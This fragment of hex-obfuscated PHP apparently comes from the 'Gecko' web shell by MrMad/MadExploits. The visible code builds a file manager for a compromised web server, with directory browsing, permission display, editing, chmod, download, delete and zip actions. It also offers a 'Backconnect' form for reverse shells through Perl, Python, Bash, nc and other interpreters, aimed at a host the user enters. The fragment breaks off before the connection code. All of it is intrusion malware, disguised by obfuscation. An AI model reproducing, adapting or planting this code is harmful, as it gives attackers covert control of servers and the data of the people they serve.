hre\x66\x3d\x22//h\x61\x73\x68e\x73.\x63\x6f\x6d/\x65\x6e/too\x6c\x73/h\x61\x73h\x5fid\x65\x6e\x74\x69\x66\x69er\" cl\x61ss=\"\x62tn-\x73ubm\x69\x74\"&gt;HASH \x49D\x45NTIFIE\x52\x3c/a&gt;\x3c/li&gt;\n\x20\x20\x20\x20\x20 \x20\x20 \x20  \x3c\x6ci&gt;\x3ca\x20href=\x22//\x67\x69\x74hu\x62\x2ecom/M\x61dExp\x6co\x69\x74s/\"\x20c\x6c\x61s\x73=\"bt\x6e-\x73\x75b\x6d\x69\x74\"\x3eRE\x41\x44\x4d\x45&lt;/a&gt;\x3c/li&gt;\n \x20\x20 \x20\x20 \x20&lt;/\x75\x6c\x3e\n    \x3c/\x64iv\x3e\n\n  \x20\x20";${${"\x47\x4c\x4f\x42\x41LS"}["y\x68\x70\x75\x62\x71\x68\x62"]}=${${"GL\x4f\x42\x41L\x53"}["\x68\x67\x75an\x71\x64\x64"]}[1]("{.[\x21\x2e],}*",GLOB_BRACE);${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x72\x6b\x68\x6d\x68re\x69\x6bx\x77"]}=${${"\x47L\x4f\x42\x41\x4cS"}["\x68gu\x61nq\x64d"]}[0]();echo "\n\x20 \x20 &lt;\x64\x69v\x20clas\x73=\"m\x65nu-f\x69le-manag\x65\x72\"\x3e\n  \x20   \x20 \x3c\x75\x6c\x3e\n  \x20\x20\x20\x20\x20  \x20  &lt;\x6c\x69&gt;\x3c\x61\x20h\x72\x65\x66\x3d\x22\" \x69\x64\x3d\x22cr\x65\x61\x74\x65_fo\x6c\x64e\x72\x22\x3e+ \x43rea\x74\x65 \x46\x6fl\x64e\x72\x3c/a\x3e\x3c/\x6c\x69&gt;\n   \x20    \x20   \x3cli&gt;\x3ca\x20\x68\x72\x65f=\x22\" \x69\x64=\x22\x63\x72e\x61\x74\x65\x5ffil\x65\x22\x3e+\x20\x43re\x61te \x46\x69\x6ce&lt;/a\x3e&lt;/li&gt;\n\x20\x20    \x20\x20\x3c/\x75l&gt;\n  \x20 \x20\x20\x20\x20\x3c\x64\x69v\x20cla\x73s\x3d\x22p\x61\x74h-\x70w\x64\"\x3e\n\x20  \x20 \x20   \x20\x20\x20";${${"\x47L\x4f\x42\x41\x4cS"}["y\x6bn\x6f\x6f\x65"]}=str_replace("\\","/",${$shgeieuiqp});${${"\x47\x4c\x4fB\x41\x4c\x53"}["hb\x73cn\x69\x6cojp"]}=explode("/",${${"\x47L\x4f\x42A\x4c\x53"}["\x79k\x6e\x6f\x6f\x65"]});if(stristr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_OS,"\x57\x49\x4e")){windowsDriver();}foreach(${$rdwgifctzya} as${${"\x47\x4c\x4fB\x41LS"}["\x78\x66\x6c\x78\x66v\x71"]}=&gt;${${"\x47\x4c\x4fB\x41\x4cS"}["\x71\x64\x6d\x6a\x78\x6f\x6di\x6f\x7a\x66\x62"]}){$ulduollcnite="v\x61l";$sorlctxtk="i";if(${${"\x47L\x4fB\x41L\x53"}["\x71dmj\x78\x6fm\x69ozfb"]}==""&amp;&amp;${${"\x47\x4c\x4fB\x41\x4cS"}["x\x66\x6c\x78\x66v\x71"]}==0){echo"&amp;nb\x73\x70;&lt;a\x20h\x72\x65\x66=\x22?\x64\x3d".hx("/")."\x22\x3e&lt;i\x20\x63l\x61\x73s\x3d\x22f\x61-\x73\x6fli\x64 \x66a-f\x6fl\x64e\x72-\x70\x6cus\"&gt;\x3c/\x69&gt;\x26nbsp;/\x20\x3c/a&gt;";continue;}if(${$ulduollcnite}=="")continue;echo"\x3c\x61 \x68r\x65f\x3d\"?\x64=";for(${${"\x47L\x4f\x42\x41\x4cS"}["\x65\x71k\x76\x67\x6f\x70\x74\x66v\x6b\x6c"]}=0;${$sorlctxtk}&lt;=${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78f\x6c\x78\x66v\x71"]};${${"\x47\x4c\x4f\x42AL\x53"}["\x65qk\x76g\x6f\x70t\x66\x76k\x6c"]}++){$krygdjevu="i";$ptusmlnm="\x69";${"\x47\x4cO\x42A\x4c\x53"}["\x71\x6ah\x68tr\x6cjn\x6a"]="id";${"G\x4c\x4fB\x41\x4cS"}["\x74vt\x75tzy\x6d"]="\x70\x77\x64";echo hx(${${"G\x4cO\x42\x41\x4c\x53"}["\x74v\x74\x75t\x7a\x79\x6d"]}[${$krygdjevu}]);if(${$ptusmlnm}!=${${"\x47\x4c\x4fB\x41\x4c\x53"}["q\x6ahh\x74\x72\x6c\x6a\x6ej"]})echo hx("/");}echo"\"&gt;".${${"\x47\x4cOBAL\x53"}["\x71\x64m\x6ax\x6fm\x69\x6f\x7afb"]}." /\x20"."&lt;/\x61&gt;";}echo"&lt;a styl\x65\x3d\x27font-w\x65\x69\x67\x68\x74:bold;\x20\x63\x6fl\x6f\x72:\x6fra\x6e\x67e;' hre\x66\x3d'?d\x3d".hx(__DIR__)."\x27\x3e[ HOM\x45 SHEL\x4c\x20]\x3c/a&gt;&amp;n\x62sp;";echo " \x20\x20\x20 \x20\x20 &lt;/d\x69\x76\x3e\n \x20\x20\x20  \x20\x20\x3c/\x75\x6c&gt;\n \x20 \x20  \x20\x20\x3ctab\x6ce\x20\x73t\x79le=\x22\x77idt\x68: 1\x30\x30%\x3b\x22\x3e\n\x20    \x20\x20 \x20 \x20\x20\x3cth\x65\x61\x64&gt;\n \x20 \x20 \x20 \x20\x20  \x20\x20   \x3ctr&gt;\n \x20 \x20\x20       \x20 \x20\x20  \x20\x20&lt;t\x68\x3eNa\x6d\x65&lt;/\x74\x68&gt;\n  \x20     \x20   \x20    \x20 \x20\x3c\x74h\x3e\x53\x69z\x65\x3c/\x74h&gt;\n   \x20\x20\x20  \x20   \x20\x20\x20\x20\x20  \x20\x3c\x74\x68\x3ePer\x6dissi\x6fn\x3c/th\x3e\n \x20\x20\x20\x20\x20  \x20 \x20\x20\x20 \x20\x20\x20\x20 \x20&lt;t\x68\x3e\x41ction\x3c/\x74h&gt;\n\x20 \x20  \x20\x20\x20 \x20 \x20  \x20\x20&lt;/t\x72&gt;\n\x20\x20 \x20\x20\x20\x20  \x20 \x20&lt;/t\x68ead&gt;\n\x20\x20\x20 \x20\x20 \x20   \x20\x3cform\x20ac\x74i\x6fn\x3d\"\x22\x20\x6d\x65\x74ho\x64\x3d\x22p\x6f\x73\x74\"&gt;\n \x20 \x20   \x20  \x20\x20    \x3ct\x62\x6fdy\x3e\n   \x20\x20\x20 \x20\x20\x20\x20      \x20\x20\x20&lt;!--\x20\x47e\x63\x6bo F\x6f\x6c\x64er \x46i\x6ce \x4d\x61\x6e\x61\x67er --&gt;\n\x20  \x20 \x20\x20\x20\x20   \x20\x20\x20 \x20  \x20";foreach(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x79\x68\x70\x75\x62\x71\x68\x62"]} as${${"G\x4c\x4f\x42A\x4cS"}["\x73\x66\x6f\x71d\x63zn\x65"]}){echo " \x20      \x20   \x20\x20    \x20 \x20\x20\x20 ";if(${${"G\x4c\x4fB\x41\x4c\x53"}["\x68\x67ua\x6e\x71d\x64"]}[2](${${"\x47L\x4f\x42\x41L\x53"}["\x73\x66oq\x64\x63\x7a\x6e\x65"]})){${"GL\x4f\x42ALS"}["\x65\x75\x6dm\x66\x61y\x6dr"]="_D";$bzxhchjn="\x5fD";$gghlcmyh="fun\x67\x73\x69";echo "\x20   \x20\x20   \x20 \x20  \x20 \x20   \x20\x20 \x20\x20   &lt;t\x72\x3e\n\x20\x20 \x20\x20  \x20\x20\x20 \x20\x20\x20 \x20\x20\x20    \x20 \x20 \x20\x20\x20 \x20\x20&lt;\x74d&gt;&lt;i\x6e\x70\x75t\x20ty\x70\x65\x3d\x22\x63\x68ec\x6b\x62o\x78\x22 \x6eam\x65\x3d\x22\x63he\x63\x6b[]\"\x20v\x61lue\x3d\"";$fbefpipagff="\x66\x75\x6e\x67\x73\x69";echo ${$bzxhchjn};${"\x47L\x4f\x42\x41\x4c\x53"}["bq\x71\x66\x6b\x74ez\x69"]="_\x44";echo "\x22&gt;&amp;\x6e\x62\x73p;&lt;i \x63\x6c\x61\x73s\x3d\"\x66\x61-solid\x20f\x61-\x66o\x6cde\x72-\x6f\x70e\x6e\"\x20st\x79\x6c\x65=\x22\x63\x6flo\x72:\x6f\x72\x61n\x67e;\x22&gt;&lt;/\x69&gt;&amp;nbsp\x3b&lt;\x61\x20hr\x65\x66=\x22?d\x3d";echo hx(${$gghlcmyh}[0]()."/".${${"G\x4c\x4fB\x41\x4cS"}["\x73\x66\x6f\x71\x64cz\x6e\x65"]});echo "\x22\x3e";${"\x47\x4c\x4f\x42AL\x53"}["\x72\x6d\x74\x65\x6c\x66"]="\x5f\x44";echo namaPanjang(${${"G\x4cOB\x41LS"}["\x62\x71\x71fkt\x65\x7a\x69"]});echo "\x3c/a\x3e\x3c/\x74d&gt;\n    \x20 \x20 \x20\x20 \x20\x20  \x20  \x20\x20\x20\x20  \x20\x20 \x20\x20   \x3c\x74\x64&gt;[ D\x49R\x20]\x3c/td&gt;\n\x20\x20\x20\x20    \x20\x20\x20    \x20 \x20\x20   \x20 \x20 \x20  \x20\x20\x20&lt;\x74d\x3e\n   \x20\x20\x20 \x20   \x20\x20\x20   \x20\x20\x20  \x20 \x20  \x20\x20\x20\x20\x20  \x20 ";if(${${"G\x4cO\x42\x41\x4c\x53"}["\x68g\x75\x61\x6e\x71\x64\x64"]}[4](${$fbefpipagff}[0]()."/".${${"\x47\x4c\x4f\x42A\x4c\x53"}["rmt\x65\x6cf"]})){echo"\x3c\x66\x6fnt c\x6f\x6co\x72=\x22#00\x66\x660\x30\x22&gt;";}elseif(!${${"\x47L\x4f\x42A\x4cS"}["\x68g\x75\x61\x6e\x71\x64\x64"]}[5](${${"\x47\x4c\x4f\x42\x41L\x53"}["\x68\x67\x75\x61\x6e\x71d\x64"]}[0]()."/".${${"G\x4c\x4fB\x41L\x53"}["\x73\x66\x6fqdc\x7a\x6e\x65"]})){echo"\x3cf\x6fnt c\x6f\x6cor=\x22r\x65d\"&gt;";}${"\x47\x4c\x4f\x42A\x4cS"}["\x67\x63\x62\x62\x66\x7a\x74\x75\x78"]="\x66\x75\x6e\x67\x73i";echo perms(${${"GLO\x42\x41L\x53"}["\x67\x63b\x62\x66z\x74\x75\x78"]}[0]()."/".${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73f\x6f\x71\x64\x63\x7a\x6ee"]});echo "\x20\x20\x20\x20\x20\x20 \x20 \x20\x20\x20\x20   \x20 \x20 \x20 \x20\x20  \x20    \x20&lt;/\x74\x64\x3e\n\x20\x20\x20 \x20    \x20   \x20\x20 \x20\x20  \x20   \x20\x20 \x20\x20 \x20\x20\x3c\x21-- Acti\x6f\x6e Fo\x6cder \x4d\x61\x6ea\x67\x65r\x20--&gt;\n  \x20\x20\x20\x20  \x20\x20\x20    \x20\x20 \x20 \x20 \x20\x20\x20   \x20\x20\x20\x20&lt;\x74\x64&gt;\x3ca\x20\x68\x72e\x66=\x22?d\x3d";$dscryyxh="\x5f\x44";$kqfvthqfwkx="\x66\x75\x6e\x67\x73\x69";echo hx(${$kqfvthqfwkx}[0]());echo "&amp;r\x65=";echo hx(${${"GL\x4f\x42\x41\x4c\x53"}["\x65u\x6d\x6d\x66a\x79m\x72"]});${"G\x4c\x4fB\x41\x4c\x53"}["\x67bl\x76\x66\x69t\x72"]="\x66\x75\x6eg\x73i";echo "\x22 cl\x61\x73\x73=\"\x62\x61\x64g\x65-a\x63t\x69\x6fn-\x65d\x69\x74\x6f\x72\x22\x3e&lt;\x69 cla\x73s\x3d\"\x66\x61-\x73ol\x69\x64\x20\x66\x61-\x70\x65\x6e-\x74\x6f-\x73\x71\x75\x61\x72\x65\x22\x3e\x3c/\x69&gt;&lt;/a&gt;&amp;\x6ebsp\x3b&lt;a h\x72ef\x3d\"?d\x3d";echo hx(${${"\x47\x4cOB\x41\x4c\x53"}["\x67\x62\x6c\x76f\x69\x74\x72"]}[0]());echo "&amp;\x63\x68=";echo hx(${$dscryyxh});echo "\" clas\x73\x3d\"\x62\x61d\x67\x65-\x61ct\x69o\x6e-\x63hmod\x22\x3e&lt;i\x20\x63\x6c\x61\x73s=\x22\x66a-\x73\x6fl\x69\x64\x20f\x61-u\x73e\x72-pen\x22&gt;\x3c/i\x3e&lt;/\x61&gt;&lt;/td\x3e\n \x20\x20\x20  \x20  \x20\x20    \x20  \x20\x20\x20\x20 \x20\x20\x20 \x20&lt;/\x74\x72&gt;\n\x20   \x20\x20\x20\x20\x20  \x20  \x20  \x20 \x20   \x20";}echo "\n   \x20       \x20  \x20  \x20\x20\x20";}echo "\n \x20  \x20 \x20\x20    \x20\x20\x20 \x20\x20 \x20&lt;\x21-- \x47\x65c\x6bo\x20\x46i\x6ces\x20M\x61n\x61ger --&gt;\n \x20\x20  \x20\x20\x20 \x20 \x20  \x20 \x20 \x20\x20";foreach(${$gceotac} as${${"\x47\x4c\x4fB\x41L\x53"}["\x62l\x71\x6az\x68zo\x75\x65f\x7a"]}){$nwtxna="_\x46";echo "\x20\x20\x20  \x20 \x20 \x20\x20   \x20 \x20\x20 \x20\x20 \x20\x20";if(${${"G\x4c\x4fBAL\x53"}["\x68\x67u\x61n\x71dd"]}[3](${$nwtxna})){$dssnjevvcr="\x66\x75\x6e\x67\x73\x69";$qvwsado="\x66\x75\x6eg\x73i";echo "   \x20  \x20 \x20 \x20\x20 \x20  \x20 \x20 \x20 \x20\x20\x20\x20  \x3ctr\x3e\n  \x20 \x20\x20  \x20 \x20 \x20  \x20\x20 \x20 \x20\x20 \x20 \x20  \x20 \x20 \x3c\x74d&gt;\x3ci\x6ep\x75t t\x79pe\x3d\x22\x63h\x65c\x6bbo\x78\"\x20\x6e\x61me\x3d\"\x63\x68\x65\x63k[]\" va\x6cu\x65\x3d\x22";echo ${${"G\x4c\x4fB\x41\x4c\x53"}["\x62\x6cq\x6azh\x7a\x6fu\x65\x66z"]};${"G\x4cO\x42\x41\x4cS"}["\x64\x6a\x72\x62\x6f\x69eu\x6c\x77"]="\x5f\x46";echo "\x22&gt;\x26\x6e\x62sp\x3b\x3ci c\x6c\x61\x73\x73\x3d\x22f\x61-\x73\x6fli\x64 f\x61-fil\x65-\x6ci\x6e\x65s\x22&gt;\x3c/i\x3e&amp;\x6e\x62sp;\x3c\x61 hre\x66=\x22?d\x3d";${"G\x4c\x4f\x42A\x4c\x53"}["jt\x63pc\x62\x66"]="\x5f\x46";${"\x47\x4c\x4fB\x41\x4c\x53"}["\x77dn\x74a\x6e\x74o\x69n"]="_\x46";echo hx(${$dssnjevvcr}[0]());${"GLOB\x41L\x53"}["\x77c\x70u\x65\x66\x79c\x65"]="\x66\x75\x6e\x67si";echo "&amp;\x66\x3d";echo hx(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x62lq\x6azh\x7a\x6fu\x65\x66\x7a"]});$qdyyefjiugm="\x66\x75\x6eg\x73\x69";echo "\x22 class\x3d\"\x67ec\x6bo-\x66i\x6c\x65\x73\"&gt;";$uysrfxodqe="\x66\x75\x6e\x67\x73\x69";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["c\x71nr\x63g\x66\x6f\x77\x6e\x6c\x72"]="\x66\x75\x6e\x67\x73\x69";echo namaPanjang(${${"\x47\x4cO\x42A\x4cS"}["bl\x71j\x7a\x68z\x6fue\x66\x7a"]});${"\x47L\x4f\x42\x41\x4c\x53"}["nkdv\x6c\x66\x78ae"]="\x5fF";echo "\x3c/\x61\x3e\x3c/td\x3e\n \x20   \x20\x20\x20  \x20\x20\x20\x20\x20\x20\x20\x20\x20\x20  \x20\x20\x20\x20   \x20 \x20\x3ct\x64\x3e";echo formatSize(filesize(${${"\x47L\x4fB\x41LS"}["j\x74cp\x63\x62\x66"]}));echo "\x3c/td\x3e\n\x20   \x20\x20 \x20\x20  \x20\x20   \x20\x20\x20  \x20\x20  \x20 \x20\x20\x20 \x20\x3c\x74d&gt;\n\x20 \x20 \x20\x20 \x20  \x20 \x20\x20\x20\x20\x20\x20\x20   \x20\x20 \x20 \x20\x20\x20\x20\x20   \x20";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x71\x78b\x73u\x63ylio\x71"]="_\x46";if(is_writable(${$qdyyefjiugm}[0]()."/".${${"G\x4c\x4fB\x41\x4c\x53"}["sfoq\x64c\x7a\x6e\x65"]})){echo"&lt;fon\x74\x20\x63\x6fl\x6f\x72\x3d\x22#0\x30ff00\x22\x3e";}elseif(!is_readable(${${"G\x4cO\x42\x41L\x53"}["c\x71\x6e\x72\x63\x67\x66o\x77\x6e\x6cr"]}[0]()."/".${${"\x47\x4cO\x42\x41LS"}["q\x78\x62\x73\x75c\x79\x6c\x69\x6f\x71"]})){echo"&lt;\x66\x6fnt \x63\x6flor=\x22\x72e\x64\x22&gt;";}echo perms(${${"\x47\x4c\x4fB\x41\x4cS"}["h\x67ua\x6e\x71\x64d"]}[0]()."/".${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6e\x6bd\x76l\x66\x78\x61\x65"]});$nqrlliy="_\x46";echo "\x20\x20 \x20  \x20 \x20\x20  \x20 \x20     \x20 \x20 \x20      \x20&lt;/t\x64&gt;\n   \x20\x20 \x20 \x20\x20\x20 \x20 \x20\x20   \x20\x20  \x20\x20\x20 \x20  \x20 \x3c\x21-- A\x63\x74\x69on\x20\x46\x69\x6ce M\x61n\x61ger\x20--&gt;\n   \x20\x20\x20 \x20\x20\x20  \x20\x20     \x20 \x20 \x20 \x20 \x20   \x20\x3ct\x64&gt;\x3ca\x20\x68r\x65\x66=\x22?\x64\x3d";echo hx(${$qvwsado}[0]());echo "&amp;\x72\x65\x3d";echo hx(${${"G\x4c\x4fB\x41L\x53"}["dj\x72b\x6f\x69\x65u\x6cw"]});echo "\x22 cl\x61\x73\x73\x3d\x22badg\x65-a\x63t\x69o\x6e-\x65\x64it\x6f\x72\x22&gt;\x3c\x69\x20\x63las\x73=\"f\x61-\x73ol\x69d\x20\x66\x61-\x70en-\x74o-sq\x75\x61r\x65\"\x3e&lt;/\x69\x3e\x3c/\x61&gt;\x26n\x62\x73p;&lt;a\x20\x68re\x66\x3d\"?d\x3d";echo hx(${$uysrfxodqe}[0]());echo "&amp;c\x68\x3d";echo hx(${$nqrlliy});echo "\x22\x20\x63la\x73s\x3d\x22ba\x64\x67e-\x61cti\x6fn-\x63\x68m\x6fd\"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\x61\x73s\x3d\"\x66\x61-s\x6fl\x69\x64 \x66a-\x75ser-\x70e\x6e\x22\x3e\x3c/i\x3e\x3c/a&gt;&amp;n\x62\x73\x70;\x3ca \x68\x72ef=\x22?\x64=";echo hx(${${"\x47\x4cO\x42A\x4cS"}["w\x63\x70\x75\x65fy\x63\x65"]}[0]());echo "\x26\x64\x6f\x6e=";echo hx(${${"\x47\x4cO\x42\x41L\x53"}["\x77\x64\x6et\x61\x6e\x74\x6f\x69\x6e"]});echo "\" \x63\x6cas\x73\x3d\"ba\x64g\x65-\x61\x63\x74\x69\x6f\x6e-\x64\x6fwn\x6c\x6fa\x64\x22\x3e\x3c\x69\x20cl\x61\x73\x73=\"\x66a-\x73o\x6cid\x20fa-do\x77nlo\x61d\"\x3e&lt;/i&gt;&lt;/\x61&gt;&lt;/\x74\x64&gt;\n\x20\x20\x20\x20 \x20\x20\x20\x20\x20        \x20\x20  \x20\x20 \x20  &lt;/\x74\x72\x3e\n\x20\x20 \x20\x20\x20  \x20 \x20 \x20 \x20 \x20  \x20\x20 \x20\x20";}echo "\n\x20\x20 \x20  \x20\x20\x20 \x20\x20 \x20\x20\x20\x20\x20  ";}echo "\n\x20\x20 \x20\x20 \x20  \x20\x20    \x20&lt;/\x74\x62\x6f\x64y\x3e\n \x20  \x20\x20\x20\x20\x3c/ta\x62l\x65\x3e\n\x20\x20 \x20\x20\x20\x20 \x3cb\x72&gt;\n \x20\x20\x20 \x20 \x20\x3csele\x63t na\x6d\x65=\"gec\x6b\x6f-\x73el\x65ct\x22\x20c\x6c\x61\x73\x73=\x22\x62tn-su\x62\x6d\x69t\x22&gt;\n \x20\x20       \x20 \x3c\x6f\x70\x74\x69o\x6e value\x3d\x22\x64e\x6ce\x74e\x22\x3e\x44el\x65\x74\x65&lt;/\x6fpt\x69on\x3e\n \x20\x20  \x20\x20  \x20 \x20\x3c\x6fp\x74io\x6e \x76\x61lu\x65\x3d\x22unz\x69p\"\x3e\x55nzip\x3c/op\x74i\x6f\x6e\x3e\n\x20   \x20\x20\x20   \x20 \x3c\x6fp\x74i\x6fn\x20\x76alu\x65\x3d\"\x7a\x69p\x22&gt;Z\x69\x70&lt;/\x6fpt\x69o\x6e\x3e&lt;b\x72&gt;\n   \x20 \x20\x20\x20\x3c/s\x65lec\x74&gt;\n\x20 \x20\x20 \x20\x20\x20&lt;\x69\x6e\x70\x75t \x74y\x70e=\"\x73u\x62mi\x74\"\x20name=\x22s\x75b\x6di\x74-\x61ctio\x6e\" v\x61lu\x65\x3d\x22\x53u\x62m\x69t\x22\x20\x63las\x73\x3d\"b\x74n-\x73u\x62\x6d\x69\x74\"\x20s\x74y\x6c\x65=\"paddin\x67: 8.\x33\x70x\x2035\x70x;\x22\x3e\n\x20\x20\x20    \x20\x3c/\x66or\x6d\x3e\n\n     \x20\x20 \x3c\x21--\x20Modal Po\x70\x20\x4aqu\x65ry \x43reat\x65 \x46older/\x46\x69l\x65 \x42y\x20./M\x72Mad --\x3e\n\x20\x20\x20 \x20\x20\x20\x20\x3c\x64\x69v\x20c\x6cas\x73=\x22mod\x61l\x22\x3e\n   \x20  \x20\x20\x20  \x20\x3cdiv c\x6cas\x73=\x22modal-\x63\x6f\x6e\x74\x61i\x6e\x65\x72\x22&gt;\n\x20\x20\x20 \x20  \x20  \x20 \x20 \x20 &lt;div \x63\x6c\x61ss\x3d\x22m\x6fd\x61l-he\x61d\x65\x72\"\x3e\n\x20      \x20\x20   \x20\x20  \x20\x20 \x20&lt;\x68\x33\x3e&lt;\x62\x3e\x3c\x69 i\x64\x3d\"\x6d\x6fda\x6c-\x74\x69\x74\x6ce\x22\x3e\${\x74his.\x74\x69tl\x65}\x3c/i&gt;&lt;/b&gt;\x3c/\x683\x3e\n \x20  \x20\x20   \x20\x20 \x20   \x3c/d\x69v\x3e\n\x20 \x20  \x20\x20\x20\x20  \x20   \x20&lt;\x66\x6f\x72m\x20act\x69o\x6e\x3d\"\" me\x74h\x6fd\x3d\x22\x70\x6fs\x74\"&gt;\n \x20\x20 \x20 \x20\x20      \x20\x20    &lt;\x64\x69v cla\x73\x73=\x22m\x6f\x64al-\x62\x6f\x64\x79\"\x3e\n \x20   \x20\x20\x20   \x20\x20 \x20\x20\x20   \x20\x20\x20\x20&lt;div\x20id=\"\x6d\x6f\x64a\x6c-\x62od\x79-b\x63\"\x3e\x3c/di\x76&gt;\n \x20   \x20\x20 \x20\x20\x20\x20 \x20\x20  \x20\x20\x20\x20\x20  &lt;s\x70an\x20\x69\x64\x3d\x22\x6d\x6fdal-\x69npu\x74\x22&gt;\x3c/sp\x61\x6e\x3e\n\x20 \x20\x20 \x20\x20 \x20  \x20\x20\x20 \x20\x20  \x20 \x20  \x3cd\x69\x76\x20c\x6ca\x73s\x3d\"m\x6fda\x6c-\x62\x74n-for\x6d\"&gt;\n\x20\x20\x20  \x20    \x20    \x20\x20\x20\x20  \x20  \x20\x20\x20 \x3c\x69n\x70\x75\x74 \x74yp\x65\x3d\x22\x73\x75\x62mit\"\x20n\x61\x6de=\x22subm\x69t\x22 \x76\x61\x6cu\x65=\x22\x53u\x62m\x69t\"\x20\x63\x6ca\x73s\x3d\"b\x74\x6e-mo\x64\x61l-clo\x73e\x20\x62\x6fx-\x73\x68\x61d\x6fw\x22\x3e\x26\x6e\x62sp\x3b\x3c\x62\x75\x74t\x6f\x6e c\x6ca\x73s\x3d\x22\x62t\x6e-\x6do\x64a\x6c-\x63\x6c\x6f\x73e \x62ox-sh\x61d\x6fw\x22\x20i\x64=\x22\x63\x6c\x6fse-mo\x64\x61l\x22\x3e\x43l\x6fse\x3c/\x62utt\x6f\x6e\x3e\n\x20\x20 \x20\x20 \x20\x20\x20 \x20 \x20\x20      \x20  \x20&lt;/d\x69v&gt;\n\x20\x20\x20\x20   \x20\x20 \x20\x20\x20   \x3c/fo\x72\x6d\x3e\n\x20 \x20\x20\x20\x20  \x20\x20 \x20\x3c/\x64i\x76&gt;\n  \x20\x20   \x20&lt;/d\x69\x76&gt;\n\x20   &lt;/\x64\x69\x76\x3e\n  \x20 \x3c/\x64\x69v\x3e\n \x20\x20\x20";if(isset($_GET["\x62\x61\x63\x6bc\x6fnne\x63\x74"])){echo "\x20\x20 \x20 \x20 \x20&lt;\x64\x69v cla\x73s=\x22mo\x64\x61l \x61c\x74ive\x22\x3e\n   \x20\x20  \x20 \x20\x20\x20&lt;\x64iv \x63las\x73\x3d\"mo\x64\x61l-c\x6fnta\x69n\x65r\"&gt;\n\x20\x20\x20 \x20      \x20\x20\x20 \x20\x3cd\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x22mo\x64\x61\x6c-\x68\x65\x61\x64\x65\x72\x22\x3e\n\x20 \x20\x20 \x20\x20\x20\x20\x20\x20\x20  \x20\x20\x20   \x3c\x683&gt;\x3cb\x3e&lt;\x69\x20\x69\x64\x3d\x22mod\x61\x6c-\x74\x69\x74le\"&gt;:: Back\x63o\x6e\x6e\x65\x63t\x3c/\x69\x3e\x3c/\x62\x3e\x3c/h\x33&gt;\n\x20\x20\x20\x20 \x20 \x20      \x20 &lt;/di\x76\x3e\n   \x20\x20 \x20 \x20\x20\x20\x20  \x20\x20\x3cf\x6f\x72m\x20acti\x6fn\x3d\x22\"\x20\x6d\x65th\x6f\x64=\"post\"&gt;\n  \x20\x20\x20\x20\x20\x20\x20\x20 \x20\x20   \x20\x20\x20\x20&lt;d\x69\x76\x20\x63l\x61s\x73\x3d\x22\x6do\x64al-\x62\x6f\x64\x79\x22\x3e\n\x20 \x20\x20   \x20\x20  \x20  \x20\x20 \x20\x20    \x20&lt;\x73e\x6c\x65c\x74\x20c\x6cas\x73=\"\x62c-gec\x6b\x6f \x62o\x78-\x73\x68\x61do\x77\"\x20\x6e\x61me=\"g\x65\x63\x6bo-\x62c\"\x3e\n\x20\x20\x20 \x20         \x20 \x20\x20 \x20     \x20\x20\x20\x3co\x70\x74\x69o\x6e\x20v\x61l\x75e\x3d\"-\"\x3eCh\x6f\x6fs\x65 Ba\x63\x6b\x63onnect&lt;/op\x74\x69\x6f\x6e&gt;\n\x20 \x20\x20\x20\x20  \x20\x20     \x20\x20 \x20\x20   \x20 \x20\x20 \x3c\x6fp\x74i\x6f\x6e\x20\x76a\x6cu\x65\x3d\x22\x70e\x72l\"\x3e\x50erl\x3c/\x6f\x70t\x69on&gt;\n\x20\x20    \x20 \x20\x20   \x20      \x20\x20\x20\x20\x20\x20 \x20&lt;opti\x6fn\x20\x76a\x6c\x75e\x3d\x22\x70\x79tho\x6e\"&gt;Python&lt;/\x6fptio\x6e&gt;\n\x20   \x20    \x20\x20  \x20 \x20  \x20 \x20\x20  \x20 \x20\x20\x3co\x70\x74\x69\x6fn\x20\x76a\x6c\x75\x65\x3d\x22\x72u\x62\x79\x22&gt;Ru\x62y&lt;/\x6fpt\x69o\x6e\x3e\n \x20\x20\x20 \x20\x20 \x20\x20\x20\x20    \x20    \x20 \x20\x20 \x20 &lt;o\x70t\x69on\x20\x76\x61l\x75e=\x22\x62\x61s\x68\"&gt;\x42\x61\x73h\x3c/\x6fpti\x6f\x6e&gt;\n\x20 \x20\x20\x20   \x20\x20  \x20\x20\x20   \x20  \x20\x20\x20\x20  \x20\x3cop\x74\x69on va\x6c\x75e=\x22p\x68p\"\x3e\x70\x68p\x3c/\x6fp\x74io\x6e\x3e\n\x20 \x20  \x20\x20  \x20\x20  \x20 \x20\x20\x20\x20 \x20\x20\x20 \x20  \x20\x3c\x6f\x70\x74io\x6e\x20v\x61\x6cue\x3d\x22n\x63\"\x3enc&lt;/o\x70\x74\x69\x6fn\x3e\n \x20\x20 \x20\x20\x20  \x20 \x20\x20\x20\x20\x20\x20  \x20\x20\x20      \x3cop\x74i\x6f\x6e\x20\x76\x61\x6c\x75e\x3d\x22sh\"&gt;\x73h&lt;/op\x74ion&gt;\n \x20\x20\x20 \x20  \x20\x20\x20 \x20 \x20\x20\x20    \x20 \x20 \x20 \x20\x3c\x6f\x70\x74\x69on\x20\x76\x61lu\x65=\x22x\x74\x65rm\"\x3eX\x74e\x72\x6d\x3c/\x6fpt\x69on&gt;\n\x20\x20  \x20\x20 \x20\x20\x20 \x20 \x20\x20      \x20     \x20&lt;op\x74\x69o\x6e \x76a\x6c\x75e\x3d\x22\x67ol\x61n\x67\x22&gt;\x47\x6f\x6cang\x3c/o\x70tio\x6e\x3e\n\x20 \x20\x20\x20\x20\x20 \x20     \x20 \x20\x20   \x20 \x20&lt;/s\x65le\x63\x74&gt;\n     \x20 \x20\x20\x20\x20  \x20 \x20\x20  \x20\x20 \x20\x20&lt;i\x6e\x70\x75t ty\x70\x65\x3d\"t\x65xt\"\x20\x6ea\x6d\x65\x3d\x22ba\x63kc\x6fnne\x63\x74-ho\x73t\x22 \x63\x6c\x61\x73s=\"mod\x61\x6c-c\x72\x65\x61t\x65-i\x6e\x70\x75t\" pla\x63eh\x6f\x6cd\x65\x72\x3d\"127.\x30\x2e0.1\"\x3e\n \x20 \x20\x20   \x20  \x20\x20\x20  \x20\x20\x20 \x20\x20 \x20\x3cbr\x3e&lt;\x62\x72&gt;\n\x20\x20\x20\x20 \x20\x20\x20 \x20\x20   \x20\x20\x20 \x20     &lt;\x69n\x70u\x74 